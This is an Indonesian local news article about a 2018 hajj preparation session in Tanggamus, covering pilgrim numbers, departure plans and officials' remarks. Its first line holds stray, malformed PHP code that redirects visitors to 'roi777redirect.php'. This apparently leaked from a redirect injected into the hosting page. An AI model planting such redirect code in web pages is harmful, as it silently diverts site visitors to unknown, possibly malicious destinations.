header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); 278 CJH Tanggamus Ikuti Manasik Haji -
278 CJH Tanggamus Ikuti Manasik Haji

Foto: DISKOMINFOSANDI TANGGAMUS

SELAMAT MANASIK HAJI: Sekda Tanggamus Andi Wijaya mewakili Pj. Bupati Zainal Abidin, saat memberikan arahan pada para CJH Tanggamus untuk ikuti manasik dengan sungguh-sungguh demi kelancaran ibadah di tanah suci.

 

TRANSLAMPUNG.COM, TANGGAMUS – Kantor Kementerian Agama Kabupaten Tanggamus menggelar Manasik Haji di Aula Islamic Center Kotaagung, Senin (2/7).

Kepala Kantor Kemenag Tanggamus Murdi Umar mengatakan, tujuan dan sasaran pembinaan manasik haji, adalah agar para calon jamaah haji menjadi haji yang mandiri cerdas dan menjadi haji yang mabrur dan mabruroh.

“Manasik haji tahun ini, kami mengusung tema Kita Optimalkan Pemahaman Jamaah Haji Menuju Haji Mandiri, Cerdas, Mabrur dan Mabruroh,” ungkap Murdi Umar.

Jumlah calon jemaah haji (CJH) asal Kabupaten Tanggamus, menurut Murdi Umar, totalnya 278 orang. Total CJH itu merupakan gabungan dari jumlah jemaah yang lakukan pelunasan Biaya Pemberangkatan Ibadah Haji (BPIH) tahap I dan II. Mereka akan berangkat pada 7 Agustus.

“Jumlah CJH tahap II yang melunasi BPIH adalah 33 orang. Maka jumlah totalnya antara tahap I dan II adalah 278 orang. Lalu ditambah dengan petugas pendamping dan medis 282 orang,” beber kepala kemenag.

“Selanjutnya untuk masa pelunasan tahap II, habis pada 25 Mei lalu. Kuota tambahan berisi kategori CJH lansia, cadangan, dan tambahan. Sedangkan kuota tahap I yang saat itu tidak sesuai dari kuota, tidak digantikan,” terang Murdi Umar.

Berdasarkan data Kemenag Tanggamus, baik CJH tertua maupun termuda, semuanya berasal dari Kecamatan Gisting. CJH Tertua bernama Zainal Karyo Dikromo, berusia 87 tahun dari Blok 33 Pekon Gisting Bawah, Kecamatan Gisting. Sedangkan CJH termuda berusia 31 tahun, bernama M. Arif Hidayat Suranto, warga Pekon Gisting Bawah.

Murdi Umar menjelaskan, jemaah haji Kabupaten Tanggamus tergabung bersama jamaah haji dari Kota Bandarlampung. Mereka akan berangkat tanggal 7 Agustus 2018. Diterima di Islamic Rajabasa pukul 14.00 WIB Embarkasi Jakarta Kloter 49 Maktab 02 wilayah Syisyah.

“Sedangkan petugas yang menyertai jamaah haji Kabupaten Tanggamus, yakni TPHI Kepala MAN 1 Tanggamus, dr. Linda Wati sebagai petugas paramedis, dan dua orang TPHD yaitu Asisten I Pemkab Tanggamus Paksi Marga dan Dandim 0424 Letkol (Arh) Anang Hasto Utomo,” tandas Murdi Umar.

Sekda Tanggamus Harapkan CJH Ikuti Manasik dengan Seksama 

MANASIK haji hari ini, juga dihadiri Sekretaris Daerah Tanggamus Hi. Andi Wijaya, S.T., M.M., mewakili Pj. Bupati Ir. Zainal Abidin. Dalam pesannya, Andi Wijaya berharap, agar seluruh CJH Tanggamus mengikuti dan menyimak manasik haji dengan sungguh-sungguh. Dengan harapan, dapat mengikuti seluruh rangkaian ibadah haji ketika sudah tiba di Tanah Suci Mekkah.

“Kami mengucapkan terima kasih atas terselenggaranya Manasik Haji tahun 1439 Hijriah 2018 Masehi yang dilaksanakan oleh Kantor Kemenag Kabupaten Tanggamus. Melalui manasik haji, para calon jamaah haji akan mendapatkan pembekalan tentang tatalaksana haji. Oleh karena itu kepada CJH, kami harapkan dapat menyimak penyampaian materi dengan baik,” tutur sekda.

Dia menambahkan, manasik haji tak ubahnya seperti gladi resik, agar CJH dapat menyiapkan diri dalam melaksanakan ibadah haji. Baik persiapan fisik maupun mental. Dengan demikian, para CJH dapat menunaikan ibadah sesuai ketentuan Syariat Islam dan dapat mengerjakan seluruh syarat dan Rukun Islam dengan sempurna,” tandas Andi Wijaya. (ayp) 

 

 

 

News Reporter